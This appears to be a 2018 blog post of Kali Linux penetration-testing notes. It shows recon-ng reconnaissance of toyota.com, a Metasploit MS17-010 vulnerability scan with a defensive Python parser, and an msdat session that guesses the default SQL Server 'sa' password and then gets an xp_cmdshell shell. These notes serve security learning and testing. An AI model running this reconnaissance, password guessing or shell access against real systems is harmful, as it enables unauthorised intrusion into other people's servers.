Tuesday 7 August 2018

Kali Linux

Nikto Web Scanner:
root@kali:/# nikto -h kali.org -p 80
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.124.249.10
+ Target Hostname:    kali.org
+ Target Port:        80
+ Start Time:         2018-08-07 04:59:05 (GMT-4)
---------------------------------------------------------------------------
+ Server: Sucuri/Cloudproxy

theHarvester:
root@kali:~# theharvester -d kali.org -b google

recon-ng
[recon-ng][default] > show workspaces
[recon-ng][default] > workspaces add toyota
[recon-ng][toyota] > show domains
[recon-ng][toyota] > add domains
domain (TEXT): toyota.com
[recon-ng][toyota] > show domains
  +-------+------------+--------------+
  | rowid | domain     | module       |
  +-------+------------+--------------+
  | 1     | toyota.com | user_defined |
  +-------+------------+--------------+
[*] 1 rows returned

[recon-ng][toyota] > use google_site_web
[recon-ng][toyota][google_site_web] > run
[recon-ng][toyota][google_site_web] > show hosts
  | 3     | www.toyota.com  |                 |        |         |          |           | google_site_web |

[recon-ng][toyota] > use bing_domain_web
[recon-ng][toyota][bing_domain_web] > run
[recon-ng][toyota][bing_domain_web] > show hosts
 | 602   | www.fleet.toyota.com  |     |        |         |     |    | bing_domain_web |

[recon-ng][toyota] > use hackertarget
[recon-ng][toyota][hackertarget] > run
[recon-ng][toyota][hackertarget] > show hosts
 | 41    | toyota.com  | 107.154.75.95   |        |         |          |           | hackertarget    |

[recon-ng][toyota] > use recon/hosts-hosts/resolve
[recon-ng][toyota][resolve] > run
[recon-ng][toyota][resolve] > show hosts
 | 3     | www.toyota.com  | 54.239.216.57   |   |   |     |      | google_site_web |

[recon-ng][toyota] > use brute_hosts
[recon-ng][toyota][brute_hosts] > run
[recon-ng][toyota][brute_hosts] > show hosts
  | 772   | www.toyota.com | 13.33.172.193   |        |         |      |      | brute_hosts  |

[recon-ng][toyota] > use mx_spf_ip
[recon-ng][toyota][mx_spf_ip] > run
[*] Retrieving MX records for toyota.com.
[*] [host] mxa-001f1301.gslb.pphosted.com (<blank>)
[*] [host] mxb-001f1301.gslb.pphosted.com (<blank>)
[recon-ng][toyota][mx_spf_ip] > show hosts
  | 675   | mxa-001f1301.gslb.pphosted.com  |   |  |  | |           | mx_spf_ip |

[recon-ng][toyota] > use reporting/xlsx
[recon-ng][toyota][xlsx] > run
[*] All data written to '/root/.recon-ng/workspaces/toyota/results.xlsx'.



Detect MS17-010 SMB vulnerability using Metasploit:
root@kali:/# netdiscover -r 10.12.0.0/24
root@kali:/# masscan -p135,445 10.12.0.21
Starting masscan 1.0.3 (http://bit.ly/14GZzcT) at 2018-08-21 07:23:08 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [2 ports/host]
Discovered open port 445/tcp on 10.12.0.21
Discovered open port 135/tcp on 10.12.0.21
root@kali:/# msfconsole
msf > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(scanner/smb/smb_ms17_010) > set rhosts 10.12.0.21
msf auxiliary(scanner/smb/smb_ms17_010) > run
[+] 10.12.0.21:445       - Host is likely VULNERABLE to MS17-010! - Windows Server 2003 R2 3790 Service Pack 2 x86 (32-bit)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
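To turn the masscan and smb_ms17_010 output above into something a defender can track, here is an added Python example (not part of the original notes, and not code from masscan or Metasploit) that parses both console formats into a per-host remediation list. The sample lines are constructed in the shape of the transcript above.

```python
import re
from collections import defaultdict

# Constructed sample output, modelled on the masscan and Metasploit
# smb_ms17_010 scanner lines shown in the transcript above.
MASSCAN_OUTPUT = """\
Discovered open port 445/tcp on 10.12.0.21
Discovered open port 135/tcp on 10.12.0.21
Discovered open port 445/tcp on 10.12.0.40
"""

MSF_OUTPUT = """\
[+] 10.12.0.21:445       - Host is likely VULNERABLE to MS17-010! - Windows Server 2003 R2 3790 Service Pack 2 x86 (32-bit)
[-] 10.12.0.40:445       - Host does NOT appear vulnerable.
[*] Scanned 2 of 2 hosts (100% complete)
"""

MASSCAN_RE = re.compile(r"Discovered open port (\d+)/(tcp|udp) on (\S+)")
MSF_VULN_RE = re.compile(
    r"^\[\+\] (\S+):(\d+)\s+- Host is likely VULNERABLE to MS17-010! - (.*)$"
)


def parse_masscan(text):
    """Map host -> set of 'port/proto' strings from masscan console output."""
    ports = defaultdict(set)
    for port, proto, host in MASSCAN_RE.findall(text):
        ports[host].add(f"{port}/{proto}")
    return dict(ports)


def parse_ms17_010(text):
    """Map host -> reported OS string for hosts the scanner flagged as likely vulnerable."""
    vuln = {}
    for line in text.splitlines():
        m = MSF_VULN_RE.match(line)
        if m:
            host, _port, os_string = m.groups()
            vuln[host] = os_string.strip()
    return vuln


def build_inventory(masscan_text, msf_text):
    """Join both outputs per host; flagged hosts first, then anything else exposing SMB."""
    ports = parse_masscan(masscan_text)
    vuln = parse_ms17_010(msf_text)
    records = []
    for host in set(ports) | set(vuln):
        open_ports = sorted(ports.get(host, ()))
        records.append({"host": host, "open_ports": open_ports,
                        "smb_exposed": "445/tcp" in open_ports,
                        "ms17_010": host in vuln, "os": vuln.get(host)})
    records.sort(key=lambda r: (not r["ms17_010"], not r["smb_exposed"], r["host"]))
    return records


if __name__ == "__main__":
    for record in build_inventory(MASSCAN_OUTPUT, MSF_OUTPUT):
        print(record)
```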

#################################################

#################################################
msdat: Microsoft SQL Database Attacking Tool
sudo apt-get install freetds-dev
root@kali:/msdat# vim /etc/freetds/freetds.conf
# Add "use ntlmv2 = yes" in your freetds configuration file
[global]
        # TDS protocol version
        tds version = auto
        use ntlmv2 = yes
root@kali:/# cd /msdat/
root@kali:/msdat# ./msdat.py passwordguesser -s 10.0.0.23
[1] (10.0.0.23:1433): Searching valid accounts on the 10.0.0.23 server, port 1433
The login sa has already been tested at least once. What do you want to do:
- stop (s/S)
- continue and ask every time (a/A)
- continue without to ask (c/C)
c
100% |#################################################################################################################################################| Time: 00:00:01
[+] Accounts found on 10.0.0.23:1433/master: {'sa': 'sa'}
root@kali:/msdat# ./msdat.py xpcmdshell -s 10.0.0.23 -U 'sa' -P 'sa' --shell
[1] (10.0.0.23:1433): Trying to get a shell thanks to xpcmdshell
10.0.0.23$hostname